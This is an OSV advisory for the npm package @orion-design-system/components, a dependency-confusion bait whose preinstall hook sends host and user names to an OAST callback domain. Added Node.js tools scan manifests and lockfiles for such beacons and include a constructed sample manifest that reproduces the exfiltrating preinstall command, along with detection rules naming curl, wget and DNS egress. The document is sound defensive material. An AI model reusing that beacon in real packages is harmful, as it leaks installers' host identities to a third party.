MAL-2026-5522

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@orion-design-system/components/MAL-2026-5522.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5522
Published
2026-06-10T18:22:00Z
Modified
2026-06-11T00:16:29.523152335Z
Summary
Malicious code in @orion-design-system/components (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (edd5d007da2de0a07fc1a0d999cccbf71a748627c82c9b2000d161eb248a5a0f)

package.json declares a preinstall hook that runs an inline node -e script. The script reads os.hostname() and os.userInfo().username and transmits them by HTTPS GET (and a DNS lookup) to d8kn5vlt5p5h1j34mbcgbx1nffwjobfoh.oast.fun, an interactsh/OAST callback subdomain that the installing party does not control. Because preinstall is an npm lifecycle script, the hook fires automatically on npm install; the package offers no opt-out, and the only installer-side suppression is running the install with --ignore-scripts.

The package is published under the @orion-design-system scope at version 9999.0.0, the canonical dependency-confusion bait version, and its README names Cloud Imperium Games / Roberts Space Industries as the intended target, confirming that the package is positioned to be resolved in place of a private internal package of the same name. Any installer whose resolver picks the public version, whether intentionally or through misconfiguration (for example a scope that is not pinned to the private registry), leaks host identifiers to a third-party collection endpoint at install time. The 9999.0.0 version pin combined with the scope-targeted README and the unconditional install-time beacon places this firmly in the active-attack / dependency-confusion-exfiltration pattern, regardless of any research framing.
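The following is an added example, not code from the advisory, the package or OSV: a static triage routine in Node.js that checks a package.json for the pattern described above (an install-time lifecycle hook that runs an inline script, reads host identity, reaches out over HTTPS or DNS, names an OAST callback domain, and ships at a dependency-confusion bait version). The sample manifests are constructed; the malicious one reproduces the shape of the behaviour described, using the callback domain from this record, but is not the package's actual script. The OAST suffixes other than .oast.fun, the rule weights and the verdict thresholds are assumptions to tune locally.

```javascript
'use strict';
// Added example, not code from the advisory or the package: static triage of
// an npm package.json for an install-time beacon of the kind described above.

// Lifecycle scripts npm runs during `npm install` with no action by the user
// (unless the install is run with --ignore-scripts).
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Callback-domain suffixes. `.oast.fun` is from this record; the others are
// interactsh-style suffixes added as an assumption and should be extended
// from local threat intel.
const OAST_SUFFIXES = ['.oast.fun', '.oast.pro', '.oast.live', '.oast.site', '.oast.online', '.oast.me'];

// Weighted regex rules applied to the concatenated bodies of install hooks.
// Weights are an assumption; tune them against your own corpus.
const RULES = [
  { name: 'inline-eval',    weight: 2, re: /\bnode\s+(?:-e|--eval|-p|--print)\b/ },
  { name: 'host-identity',  weight: 2, re: /os\.(?:hostname|userInfo)\s*\(|\bwhoami\b|\$HOSTNAME\b/ },
  { name: 'network-egress', weight: 2, re: /\b(?:https?\.(?:get|request)|fetch|dns\.(?:lookup|resolve)|curl|wget)\b/ },
];

// Loose hostname matcher; candidates are then filtered by OAST_SUFFIXES.
const HOSTNAME_RE = /\b(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}\b/gi;

function installHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const hooks = {};
  for (const k of INSTALL_HOOKS) if (typeof scripts[k] === 'string') hooks[k] = scripts[k];
  return hooks;
}

function oastDomains(text) {
  const found = new Set();
  for (const m of text.match(HOSTNAME_RE) || []) {
    const host = m.toLowerCase();
    if (OAST_SUFFIXES.some(s => host.endsWith(s))) found.add(host);
  }
  return [...found].sort();
}

// 9999.x is the conventional dependency-confusion bait version; any major
// >= 9000 is treated as suspicious (the threshold is an assumption).
function isBaitVersion(version) {
  const m = /^(\d+)\./.exec(String(version || ''));
  return m !== null && Number(m[1]) >= 9000;
}

function triageManifest(pkg) {
  const hooks = installHooks(pkg);
  const body = Object.values(hooks).join('\n');
  const findings = [];
  let score = 0;
  for (const k of Object.keys(hooks)) { findings.push('install-hook:' + k); score += 1; }
  for (const r of RULES) if (r.re.test(body)) { findings.push(r.name); score += r.weight; }
  const domains = oastDomains(body);
  if (domains.length > 0) { findings.push('oast-callback'); score += 4; }
  if (typeof pkg.name === 'string' && pkg.name.startsWith('@') && isBaitVersion(pkg.version)) {
    findings.push('dependency-confusion-bait-version'); score += 3;
  }
  // Verdict thresholds are an assumption: a lone install hook is common in
  // legitimate native-addon packages and should not block on its own.
  const verdict = score >= 7 ? 'block' : score >= 3 ? 'review' : 'allow';
  return { name: pkg.name, version: pkg.version, score, verdict, findings, domains };
}

// Constructed samples. SAMPLE_BEACON mirrors the behaviour described in this
// record (hook, inline node -e, hostname/username, HTTPS GET plus DNS lookup,
// OAST domain, bait version) but is not the package's actual script.
const SAMPLE_BEACON = {
  name: '@orion-design-system/components',
  version: '9999.0.0',
  scripts: {
    preinstall:
      `node -e "const os=require('os'),https=require('https'),dns=require('dns');` +
      `const q='h='+os.hostname()+'&u='+os.userInfo().username;` +
      `dns.lookup('d8kn5vlt5p5h1j34mbcgbx1nffwjobfoh.oast.fun',()=>{});` +
      `https.get('https://d8kn5vlt5p5h1j34mbcgbx1nffwjobfoh.oast.fun/?'+q,()=>{})"`,
  },
};
const SAMPLE_CLEAN = { name: 'tiny-utils', version: '1.2.3', scripts: { build: 'tsc -p .', test: 'node --test' } };
const SAMPLE_NATIVE_ADDON = { name: 'fast-hash-native', version: '2.0.1', scripts: { install: 'node-gyp rebuild' } };

for (const s of [SAMPLE_BEACON, SAMPLE_CLEAN, SAMPLE_NATIVE_ADDON]) {
  console.log(JSON.stringify(triageManifest(s)));
}
```

Run it over every package.json under node_modules, or over tarballs before they are admitted to an internal mirror. The thresholds deliberately let a lone install hook through: native-addon packages use them legitimately, and it is the combination of hook, inline eval, identity read, egress and callback domain that marks the beacon pattern.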

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-10T18:22:00Z",
            "versions": [
                "9999.0.2"
            ],
            "sha256": "5b2f8f861c74d508ab4b8c3716b24502c9b7d9576a1a7d5a12d943c8689a8aa6",
            "id": "IN-MAL-2026-005266",
            "source": "amazon-inspector",
            "import_time": "2026-06-10T19:23:46.785502526Z"
        },
        {
            "modified_time": "2026-06-10T18:23:01Z",
            "versions": [
                "9999.0.0"
            ],
            "sha256": "edd5d007da2de0a07fc1a0d999cccbf71a748627c82c9b2000d161eb248a5a0f",
            "id": "IN-MAL-2026-005277",
            "source": "amazon-inspector",
            "import_time": "2026-06-10T19:23:47.439615066Z"
        },
        {
            "modified_time": "2026-06-10T18:22:46Z",
            "versions": [
                "9999.0.1"
            ],
            "sha256": "fa4498f70425b07b70b45e690ec9bd4df39e2331b867b38f6c514fdace564d9a",
            "id": "IN-MAL-2026-005272",
            "source": "amazon-inspector",
            "import_time": "2026-06-10T19:23:47.141951991Z"
        },
        {
            "modified_time": "2026-06-10T18:22:45Z",
            "versions": [
                "9999.0.1"
            ],
            "sha256": "613c244d661e5d4c24917f7b5f875ae3ba06702e87bb39e87c536a069a4bfdfd",
            "id": "IN-MAL-2026-005271",
            "source": "amazon-inspector",
            "import_time": "2026-06-10T19:23:47.09525798Z"
        },
        {
            "modified_time": "2026-06-10T18:23:02Z",
            "versions": [
                "9999.0.0"
            ],
            "sha256": "7c720b8affc812f8715ba3276062643ae5cdf7f33e1fdb2d9b7f863aed37b265",
            "id": "IN-MAL-2026-005278",
            "source": "amazon-inspector",
            "import_time": "2026-06-10T19:23:47.503943982Z"
        },
        {
            "modified_time": "2026-06-10T18:22:00Z",
            "versions": [
                "9999.0.2"
            ],
            "sha256": "9bb4e5dc245e5190ba0541c3743ac690169de2eb2aff99bdba66f827d9233b65",
            "id": "IN-MAL-2026-005265",
            "source": "amazon-inspector",
            "import_time": "2026-06-10T19:23:46.713464407Z"
        },
        {
            "modified_time": "2026-06-10T23:32:00Z",
            "versions": [
                "9999.0.3"
            ],
            "sha256": "c77b1552ac6270761850a9f7f42c3eea13802392e2684f7093da3dcba4b11196",
            "id": "IN-MAL-2026-005307",
            "source": "amazon-inspector",
            "import_time": "2026-06-11T00:00:56.874208606Z"
        },
        {
            "modified_time": "2026-06-10T23:31:59Z",
            "versions": [
                "9999.0.3"
            ],
            "sha256": "cace6502c119f3fc25871413e4600fe6c4a278186974e38cae72390e11769379",
            "id": "IN-MAL-2026-005306",
            "source": "amazon-inspector",
            "import_time": "2026-06-11T00:00:56.78812158Z"
        }
    ]
}

Affected packages

npm / @orion-design-system/components

Package

Name
@orion-design-system/components
Purl
pkg:npm/%40orion-design-system%2Fcomponents

Affected ranges

Affected versions

9999.*
9999.0.0
9999.0.1
9999.0.2
9999.0.3

Database specific

indicators
{
    "domains": [
        "bzexvuarrenmkxiyjrichx8eaxwssgv0x.oast.fun",
        "orion-components.scan-9c76f414b7ee.bzexvuarrenmkxiyjrichx8eaxwssgv0x.oast.fun"
    ],
    "evidence_files": [
        {
            "sha256": "fd725b830e409f5f9ce4266ef67a551dc04c2717c2f48d40421753e04cc9b452",
            "tlsh": "cb019978062098331dd644f403ba691bb1f3da86c9d55c0adae741c5a3ca7f127ba075",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "components-9999.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-vk7A+KG+nSHeyeIFS2dnWSRfHK1GcUNy6KeaxA9CccY1e9x0tQSFdoPqFaEVVpzRwv8j6/teTodSIPJbJqtSbg==",
                "sha1": "20278b5365b66eac2b5b32456d52ea1c36ab9d90"
            }
        }
    ]
}
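As an added example that is not part of this record: the indicators above (the sha512 SRI of components-9999.0.0.tgz and the 9999.* affected range) are what a lockfile audit would match on, and the dependency-confusion exposure itself is a registry-resolution problem that .npmrc controls. The Node.js script below parses an .npmrc and a package-lock.json (v2/v3 packages map), reports whether install scripts are disabled and whether each scope is pinned to a registry, and flags lockfile entries whose integrity matches the known-bad SRI, whose version falls in the affected range, or whose resolved URL points at a registry other than the one pinned for their scope. The lockfile, both .npmrc variants, the private registry host npm.internal.example and the placeholder integrities of the other two packages are constructed.

```javascript
'use strict';
// Added example, not code from the advisory or OSV: audit a package-lock.json
// and .npmrc against this record's indicators and against the registry
// configuration that decides whether a scoped name can be resolved publicly.

// Indicators from this record: the sha512 SRI of components-9999.0.0.tgz and
// the affected range 9999.*.
const IOCS = {
  integrity: new Set([
    'sha512-vk7A+KG+nSHeyeIFS2dnWSRfHK1GcUNy6KeaxA9CccY1e9x0tQSFdoPqFaEVVpzRwv8j6/teTodSIPJbJqtSbg==',
  ]),
  packages: { '@orion-design-system/components': /^9999\./ },
};

// Minimal .npmrc parser: `key=value` lines, `#`/`;` comments.
function parseNpmrc(text) {
  const cfg = {};
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (line === '' || line.startsWith('#') || line.startsWith(';')) continue;
    const eq = line.indexOf('=');
    if (eq < 0) continue;
    cfg[line.slice(0, eq).trim()] = line.slice(eq + 1).trim();
  }
  return cfg;
}

function registryHost(url) {
  try { return new URL(url).host; } catch { return null; }
}

function scopeOf(name) {
  return name.startsWith('@') ? name.split('/')[0] : null;
}

// Package name from a lockfile v2/v3 `packages` key such as
// "node_modules/a/node_modules/@scope/b" -> "@scope/b".
function nameFromPath(path) {
  const marker = 'node_modules/';
  return path.slice(path.lastIndexOf(marker) + marker.length);
}

function auditLockfile(lock, npmrcText, iocs) {
  const cfg = parseNpmrc(npmrcText);
  const findings = [];
  if (cfg['ignore-scripts'] !== 'true') findings.push({ path: '.npmrc', issue: 'install-scripts-enabled' });
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === '') continue; // the root project itself
    const name = entry.name || nameFromPath(path);
    if (entry.integrity && iocs.integrity.has(entry.integrity)) findings.push({ path, issue: 'known-bad-integrity' });
    const range = iocs.packages[name];
    if (range && range.test(entry.version || '')) findings.push({ path, issue: 'version-in-affected-range' });
    const scope = scopeOf(name);
    if (scope) {
      const pinned = cfg[scope + ':registry'];
      const host = registryHost(entry.resolved || '');
      if (!pinned) findings.push({ path, issue: 'scope-not-pinned-to-registry' });
      else if (host && host !== registryHost(pinned)) findings.push({ path, issue: 'scope-resolved-from-unexpected-registry', host });
    }
  }
  return findings;
}

// Constructed lockfile: one entry carries the SRI from this record; the other
// integrities and the private registry host npm.internal.example are made up.
const LOCKFILE = {
  name: 'example-app', lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', version: '0.1.0' },
    'node_modules/@orion-design-system/components': {
      version: '9999.0.0',
      resolved: 'https://registry.npmjs.org/@orion-design-system/components/-/components-9999.0.0.tgz',
      integrity: 'sha512-vk7A+KG+nSHeyeIFS2dnWSRfHK1GcUNy6KeaxA9CccY1e9x0tQSFdoPqFaEVVpzRwv8j6/teTodSIPJbJqtSbg==',
    },
    'node_modules/@orion-design-system/tokens': {
      version: '1.4.0',
      resolved: 'https://npm.internal.example/@orion-design-system/tokens/-/tokens-1.4.0.tgz',
      integrity: 'sha512-CONSTRUCTED-PLACEHOLDER-A==',
    },
    'node_modules/lodash': {
      version: '4.17.21',
      resolved: 'https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz',
      integrity: 'sha512-CONSTRUCTED-PLACEHOLDER-B==',
    },
  },
};

// Weak: every name, private scopes included, falls through to the public
// registry, and lifecycle scripts run on install.
const NPMRC_WEAK = 'registry=https://registry.npmjs.org/\n';

// Hardened: the internal scope resolves only from the private registry, and
// lifecycle scripts do not run on install.
const NPMRC_HARDENED = [
  'registry=https://registry.npmjs.org/',
  '@orion-design-system:registry=https://npm.internal.example/',
  'ignore-scripts=true',
].join('\n');

console.log(JSON.stringify(auditLockfile(LOCKFILE, NPMRC_WEAK, IOCS)));
console.log(JSON.stringify(auditLockfile(LOCKFILE, NPMRC_HARDENED, IOCS)));
```

The hardened .npmrc is the configuration that defuses both halves of this record: with the scope pinned, npm never asks the public registry for @orion-design-system/* names, so the 9999.x bait cannot win resolution, and with ignore-scripts set the preinstall beacon cannot fire even if a bad version does land in node_modules. ignore-scripts also suppresses legitimate install steps, so packages that need them (native addons, for example) have to be rebuilt explicitly with npm rebuild.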
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@orion-design-system/components/MAL-2026-5522.json"